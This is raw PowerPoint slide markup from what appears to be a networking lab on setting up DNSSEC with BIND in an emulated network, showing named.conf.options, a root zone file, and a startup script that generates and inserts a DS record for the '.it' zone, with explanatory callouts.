                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD17582A-4F42-B287-E209-F31254EC2860}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3393" y="3467"/>
              <a:ext cx="1744" cy="34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None/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0"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include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named.conf.options</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include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trusted-key.conf</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pP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zone "."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hint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file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db.root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a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D45F56CA-7B0D-9899-8061-5D6B2A1EF908}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3421" y="3438"/>
              <a:ext cx="990"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pc4\</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a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24ACB055-D8AB-3FA1-7775-F63CCF7AE1D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5744635" y="2028522"/>
            <a:ext cx="6168475" cy="2650995"/>
            <a:chOff x="3393" y="3438"/>
            <a:chExt cx="1744" cy="378"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54A4759F-3A02-56AC-F512-E433CA780F2F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3393" y="3467"/>
              <a:ext cx="1744" cy="34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None/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0"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options {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    directory "/var/cache/</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recursion</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> yes;</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allow</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-query { 127.0.0.1; 192.168.100.0/24;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listen</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-on { 127.0.0.1; 192.168.100.10;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dnssec-validation</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> yes;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{944BE9B9-F842-2DC3-3383-6ECBCEBCEF68}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3421" y="3438"/>
              <a:ext cx="1311"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pc4\</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named.conf.options</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1887695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CF838-7C7E-5275-ED45-E92F672DD8CF}"/>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8B709002-8B4F-1AD4-A832-F5DF428F74CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1314750"/>
            <a:ext cx="11159820" cy="4938154"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="9028" cy="1739"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25EA7E05-CD6D-6D14-8108-4D1EC809F8DB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="9028" cy="1681"/>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10.0.3.5/24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110.0.0.0/24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210.0.3.0/24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100.0.75.0/24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200.1.1.0/24 via 10.0.3.2</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195.0.10.0/24 via 10.0.3.2</a:t>
              </a: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/var/cache/bind/keys</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/var/cache/bind</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775 /var/cache/bind</a:t>
              </a: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  while ! dig @10.0.3.10 it DNSKEY | grep -q "257 3 13"; do sleep 2; done</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  echo "" &gt;&gt;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dig @10.0.3.10 it DNSKEY | </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec-dsfromkey</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -f - it &gt;&gt;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sed -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>i</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 's/2024120401/2024120402/'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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rndc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> reload .</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>) &amp;</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6357E8F7-543B-4831-B579-C95CC2A1E142}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="2705" cy="143"/>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nsroot.startup</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37227AB7-4588-4299-B7FB-51546CF94B3A}"/>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8D4569B3-830D-A292-2184-04A46DC078F0}"/>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9FCAFA48-DC6B-2A91-0D46-72469AA42C99}"/>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5" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D7E93C4-D268-0E89-2330-87D8B6F488F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8217099" y="2858984"/>
            <a:ext cx="3830316" cy="917369"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -58873"/>
              <a:gd name="adj2" fmla="val 14579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queries the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dnsit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> server (10.0.3.10) asking for its public keys (DNSKEY) for the it zone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{492A64D5-95E1-79E3-2A20-13B9B67BCC62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6825960" y="5155887"/>
            <a:ext cx="3830316" cy="627396"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -112509"/>
              <a:gd name="adj2" fmla="val -63714"/>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adds a blank line to the end of the root zone file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3433745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75DB7-C501-F7DE-365D-00D5283F8708}"/>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84D2E35D-A25E-0C5B-1EF3-3ABC7AFBA426}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1314750"/>
            <a:ext cx="11159820" cy="4938154"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="9028" cy="1739"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{890A8480-49FD-A6D9-D57D-BAA3AFF12AEB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="9028" cy="1681"/>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10.0.3.5/24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110.0.0.0/24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210.0.3.0/24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100.0.75.0/24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200.1.1.0/24 via 10.0.3.2</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195.0.10.0/24 via 10.0.3.2</a:t>
              </a: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/var/cache/bind/keys</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/var/cache/bind</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775 /var/cache/bind</a:t>
              </a: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  while ! dig @10.0.3.10 it DNSKEY | grep -q "257 3 13"; do sleep 2; done</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  echo "" &gt;&gt;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dig @10.0.3.10 it DNSKEY | </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec-dsfromkey</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -f - it &gt;&gt;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sed -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>i</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 's/2024120401/2024120402/'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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rndc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> reload .</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>) &amp;</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E5949289-319D-73A1-E3D9-47E44441F654}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="2705" cy="143"/>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nsroot.startup</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5EA46AAC-B38B-7039-4C17-ABE31B6389B6}"/>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7325716E-BB5C-85A2-4B6B-65E7E7744B70}"/>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58E7B623-7E6E-70D9-90AA-743579289578}"/>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5" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38AAC33C-C003-4AF0-F7BE-E7941EE9B3E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6787823" y="2306057"/>
            <a:ext cx="4981597" cy="1560120"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -19186"/>
              <a:gd name="adj2" fmla="val 13379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Downloads the .it public key (DNSKEY).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Passes it to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dnssec-dsfromkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> command, which calculates the key's hash and generates the DS (Delegation Signer) record.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Adds this DS record to the root file (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>db.root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A2A3B1D-FD44-A2C2-33B3-D9517B29D19D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7550354" y="5847322"/>
            <a:ext cx="3830316" cy="627396"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -58873"/>
              <a:gd name="adj2" fmla="val -8832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searches the file for the serial string and increments it</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2021227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B511E-199F-D63B-3D22-0597D3685232}"/>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5A4B2BFD-2C82-E66E-5F16-F73F85CB8A81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2275497" y="2033534"/>
            <a:ext cx="7641005" cy="2790932"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="889"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA5E662C-3F13-BB33-6AC2-938EAF114906}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="831"/>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$TTL 60000</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@       IN      SOA     ROOT-SERVER.    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root.ROOT</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-SERVER. (</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                        2024120401 28800 14400 3600000 0 )</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@               IN      NS      ROOT-SERVER.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ROOT-SERVER.    IN      A       10.0.3.5</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>it.             IN      NS      dnsit.it.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsit.it.       IN      A       10.0.3.10</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226E68A9-9288-A07B-574D-E8337D217901}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="2712" cy="13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nsroot</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2B4F1100-0DED-1C17-77C4-E2A4E96819DF}"/>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D9AF533A-7020-9DB9-E608-40CA9B55DC84}"/>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2AA45994-B9ED-00CD-214F-39224E83DC5C}"/>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1102496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6A39E-A239-63D1-D6EB-60FBCD3128B6}"/>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D22B4B3F-365B-B130-053B-0FDBEEC7142A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2275497" y="1814065"/>
            <a:ext cx="7641005" cy="3205608"/>
            <a:chOff x="126" y="3285"/>
            <a:chExt cx="5943" cy="1189"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DF9BF31-0266-A5E5-73CE-33F8F2C3EDA9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
